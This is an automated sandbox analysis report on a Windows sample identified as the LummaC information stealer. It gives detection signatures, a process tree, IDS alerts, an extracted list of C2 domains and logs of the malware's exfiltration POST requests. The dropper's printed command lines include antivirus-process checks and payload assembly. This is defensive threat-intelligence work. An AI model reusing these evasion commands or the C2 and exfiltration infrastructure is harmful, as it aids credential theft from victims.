Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
vUcZzNWkKc.exe

Overview

General Information

Sample name:vUcZzNWkKc.exe
renamed because original name is a hash value
Original sample name:2882ead03a58608f2f73c66b861299a3.exe
Analysis ID:1581585
MD5:2882ead03a58608f2f73c66b861299a3
SHA1:6a8adde3d6ceda99d430611a3e06a8bc6ec9bfe0
SHA256:5866e752f869f91e6084a50c2ee65991de91b9e63f4ea9d1ac9bce9b4123a77d
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Hides threads from debuggers
Leaks process information
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

  • System is w10x64
  • vUcZzNWkKc.exe (PID: 7504 cmdline: "C:\Users\user\Desktop\vUcZzNWkKc.exe" MD5: 2882EAD03A58608F2F73C66B861299A3)
    • PasoCattle.exe (PID: 7692 cmdline: "C:\Users\user\AppData\Local\Temp\PasoCattle.exe" MD5: A3E9A86D6EDE94C3C71D1F7EEA537766)
      • cmd.exe (PID: 7752 cmdline: "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7836 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 7844 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • tasklist.exe (PID: 7884 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 7900 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 7932 cmdline: cmd /c md 768400 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • extrac32.exe (PID: 7948 cmdline: extrac32 /Y /E Reflect MD5: 9472AAB6390E4F1431BAA912FCFF9707)
        • findstr.exe (PID: 7972 cmdline: findstr /V "cocks" Articles MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 7984 cmdline: cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled V MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • Climb.com (PID: 8000 cmdline: Climb.com V MD5: 62D09F076E6E0240548C2F837536A46A)
        • choice.exe (PID: 8032 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
    • Set-up.exe (PID: 7744 cmdline: "C:\Users\user\AppData\Local\Temp\Set-up.exe" MD5: 2A99036C44C996CEDEB2042D389FE23C)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["inherineau.buzz", "prisonyfork.buzz", "cashfuzysao.buzz", "hummskitnj.buzz", "spuriotis.click", "appliacnesot.buzz", "rebuildeso.buzz", "scentniej.buzz", "screwamusresz.buzz"], "Build id": "5FwhVM--lll"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
        SourceRuleDescriptionAuthorStrings
        0.2.vUcZzNWkKc.exe.610000.0.unpackMALWARE_Win_DLInjector04Detects downloader / injectorditekSHen
        • 0x78d71d:$s1: Runner
        • 0x78d882:$s3: RunOnStartup
        • 0x78d731:$a1: Antis
        • 0x78d75e:$a2: antiVM
        • 0x78d765:$a3: antiSandbox
        • 0x78d771:$a4: antiDebug
        • 0x78d77b:$a5: antiEmulator
        • 0x78d788:$a6: enablePersistence
        • 0x78d79a:$a7: enableFakeError
        • 0x78d8ab:$a8: DetectVirtualMachine
        • 0x78d8d0:$a9: DetectSandboxie
        • 0x78d8fb:$a10: DetectDebugger
        • 0x78d90a:$a11: CheckEmulator

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7752, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7900, ProcessName: findstr.exe
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-28T09:33:36.486952+010020283713Unknown Traffic192.168.2.449737172.67.128.184443TCP
        2024-12-28T09:33:58.029226+010020283713Unknown Traffic192.168.2.449741172.67.128.184443TCP
        2024-12-28T09:34:00.455322+010020283713Unknown Traffic192.168.2.449742172.67.128.184443TCP
        2024-12-28T09:34:02.816452+010020283713Unknown Traffic192.168.2.449743172.67.128.184443TCP
        2024-12-28T09:34:05.267953+010020283713Unknown Traffic192.168.2.449744172.67.128.184443TCP
        2024-12-28T09:34:07.623320+010020283713Unknown Traffic192.168.2.449745172.67.128.184443TCP
        2024-12-28T09:34:09.995549+010020283713Unknown Traffic192.168.2.449747172.67.128.184443TCP
        2024-12-28T09:34:13.558667+010020283713Unknown Traffic192.168.2.449754172.67.128.184443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-28T09:33:56.739542+010020546531A Network Trojan was detected192.168.2.449737172.67.128.184443TCP
        2024-12-28T09:33:58.800935+010020546531A Network Trojan was detected192.168.2.449741172.67.128.184443TCP
        2024-12-28T09:34:14.403022+010020546531A Network Trojan was detected192.168.2.449754172.67.128.184443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-28T09:33:56.739542+010020498361A Network Trojan was detected192.168.2.449737172.67.128.184443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-28T09:33:58.800935+010020498121A Network Trojan was detected192.168.2.449741172.67.128.184443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-28T09:34:08.468226+010020480941Malware Command and Control Activity Detected192.168.2.449745172.67.128.184443TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: vUcZzNWkKc.exeAvira: detected
        Source: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP173521000335a1Avira URL Cloud: Label: malware
        Source: http://home.fortth14ht.top/nTrmsAvira URL Cloud: Label: malware
        Source: http://home.fortth14ht.top/nTrmAvira URL Cloud: Label: malware
        Source: 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["inherineau.buzz", "prisonyfork.buzz", "cashfuzysao.buzz", "hummskitnj.buzz", "spuriotis.click", "appliacnesot.buzz", "rebuildeso.buzz", "scentniej.buzz", "screwamusresz.buzz"], "Build id": "5FwhVM--lll"}
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeReversingLabs: Detection: 69%
        Source: vUcZzNWkKc.exeReversingLabs: Detection: 47%
        Source: vUcZzNWkKc.exeVirustotal: Detection: 31%Perma Link
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
        Source: vUcZzNWkKc.exeJoe Sandbox ML: detected
        Source: 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmpString decryptor: hummskitnj.buzz
        Source: 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmpString decryptor: cashfuzysao.buzz
        Source: 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmpString decryptor: appliacnesot.buzz
        Source: 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmpString decryptor: screwamusresz.buzz
        Source: 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmpString decryptor: inherineau.buzz
        Source: 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmpString decryptor: scentniej.buzz
        Source: 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmpString decryptor: rebuildeso.buzz
        Source: 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmpString decryptor: prisonyfork.buzz
        Source: 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmpString decryptor: spuriotis.click
        Source: 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
        Source: 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
        Source: 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
        Source: 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
        Source: 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmpString decryptor: Workgroup: -
        Source: 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmpString decryptor: 5FwhVM--lll
        Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.00000000072E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_fccbe689-d
        Source: vUcZzNWkKc.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.4:49737 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.4:49741 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.4:49742 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.4:49743 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.4:49744 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.4:49745 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.4:49747 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.4:49754 version: TLS 1.2
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 1_2_00406301 FindFirstFileW,FindClose,1_2_00406301
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 1_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00406CC7
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\768400\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\768400Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49741 -> 172.67.128.184:443
        Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49745 -> 172.67.128.184:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49741 -> 172.67.128.184:443
        Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49737 -> 172.67.128.184:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 172.67.128.184:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49754 -> 172.67.128.184:443
        Source: Malware configuration extractorURLs: inherineau.buzz
        Source: Malware configuration extractorURLs: prisonyfork.buzz
        Source: Malware configuration extractorURLs: cashfuzysao.buzz
        Source: Malware configuration extractorURLs: hummskitnj.buzz
        Source: Malware configuration extractorURLs: spuriotis.click
        Source: Malware configuration extractorURLs: appliacnesot.buzz
        Source: Malware configuration extractorURLs: rebuildeso.buzz
        Source: Malware configuration extractorURLs: scentniej.buzz
        Source: Malware configuration extractorURLs: screwamusresz.buzz
        Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
        Source: global trafficHTTP traffic detected: POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1Host: home.fortth14ht.topAccept: */*Content-Type: application/jsonContent-Length: 451311Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 32 30 33 34 30 34 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c
        Source: global trafficHTTP traffic detected: GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1Host: home.fortth14ht.topAccept: */*
        Source: global trafficHTTP traffic detected: POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1Host: home.fortth14ht.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
        Source: Joe Sandbox ViewIP Address: 3.218.7.103 3.218.7.103
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 172.67.128.184:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 172.67.128.184:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49754 -> 172.67.128.184:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49747 -> 172.67.128.184:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 172.67.128.184:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 172.67.128.184:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 172.67.128.184:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 172.67.128.184:443
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: spuriotis.click
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 45Host: spuriotis.click
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SZB9DPFPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18101Host: spuriotis.click
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BJ3R6HHLJRG3T2MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8764Host: spuriotis.click
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CFC8QXO2IQ469U639D6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20441Host: spuriotis.click
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9HK79OX2B6X1K0XFSJNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1261Host: spuriotis.click
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5M3LFGFBW5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 550233Host: spuriotis.click
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: spuriotis.click
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
        Source: global trafficHTTP traffic detected: GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1Host: home.fortth14ht.topAccept: */*
        Source: global trafficDNS traffic detected: DNS query: httpbin.org
        Source: global trafficDNS traffic detected: DNS query: yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVn
        Source: global trafficDNS traffic detected: DNS query: home.fortth14ht.top
        Source: global trafficDNS traffic detected: DNS query: spuriotis.click
        Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: spuriotis.click
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Sat, 28 Dec 2024 08:33:38 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
